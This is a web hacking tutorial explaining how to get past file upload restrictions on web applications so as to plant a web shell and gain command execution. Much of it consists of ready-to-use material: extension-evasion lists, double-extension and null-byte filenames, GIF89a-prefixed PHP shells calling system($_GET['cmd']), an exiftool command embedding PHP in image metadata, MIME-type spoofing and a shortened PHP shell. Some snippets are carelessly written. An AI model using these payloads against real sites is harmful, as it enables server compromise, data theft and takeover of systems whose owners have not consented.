Bypass File Upload Restrictions on Web Apps to Pop a Shell

Some dynamic websites allow it’s users to upload files, images, songs, movies, or anything specific. Such as Facebook and Linkedin allow their users to upload profile pictures and resume. File uploading is crucial for many web applications and at the same time, its a big risk if proper security controls are not implemented on file uploads.

Don’t Miss: How To Get Root By Uploading a Shell to a Web Server (Backdoor Image)

Because there are various techniques for hackers to bypass and beat file upload restrictions to pop a shell.

Introduction

Today, we’ll discuss how a hacker can make use of unrestricted file upload vulnerability to compromise websites and servers.

Before getting started! It is important to know the basic details about web shells and file upload vulnerabilities. Attackers use web shells for various operations such as executing shell commands, deleting files, creating files, downloading files, etc.

Often times it is possible just to upload a reverse shell without bypassing filters and restrictions.

Bypassing Blacklists

In blacklisting certain types of extensions are explicitly prohibited from being uploaded to the server. This might seems like an optimal solution to protect your server from getting infected, but it is possible to bypass certain conditions.

File Extensions

Developers my blacklist certain file extensions and prevent users from uploading those files that are considered dangerous for the server. But this can be bypass by changing some strings in extensions to upload and execute payload or web shell.

Type Extensions
PHP .pht, phtml, .php, .php3, .php4, .php5, .php6, .inc
JSP .jsp, .jspx, .jsw, .jsv, and .jspf
Perl .pl, .pm, .cgi, .lib
Asp asp, .aspx
Coldfusion .cfm, cfml, .cfc, .dbm

In some cases changing extensions might not do the trick instead you have to do like,

.pHp, .Php, .phP

Bypassing Whitelists

In whitelisting, where the server only accepts only specific extensions. For example, a website where you have to upload a profile picture that might take JPG, JPEG, or PNG files.

Apache allows files to be uploaded with double extensions. That means we can trick the server into accepting a shell that also has a PNG extension in the end.

shell.php.png
shell.php%00.png
shell.php\x00.jpg

Another way to bypass whitelisting is to manipulating file type headers.

If a certain website accepts images that will also accept GIF images. We can add GIF89a to trick the server into uploading shell.

GIF89a; <?php system($_GET['cmd']); ?>

GIF89a;
<?
system($_GET['cmd']); # shellcode goes here
?>

EXIF Data

This method allows us to bypass file upload restrictions by utilizing EXIF data in an image. Inserting a comment that contains PHP code will be executed by the server when an image is processed.

You can do this with gimp or ExifTool

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.png
mv image.jpg image.php.png

MIME-type

Blacklisting MIME types is also a method of file upload validation. It may be bypassed by intercepting the POST request on the way to the server and modifying the MIME type.

Normal PHP MIME type:

Content-type: application/x-php

Replace with

Content-type: image/jpeg

Other Bypassing Methods

In some situations, the length of content can also cause trouble to validate uploaded files. For that, PHP shell command can be shortened like this,

<?='$_GET[x]'?>

Back to top button
Close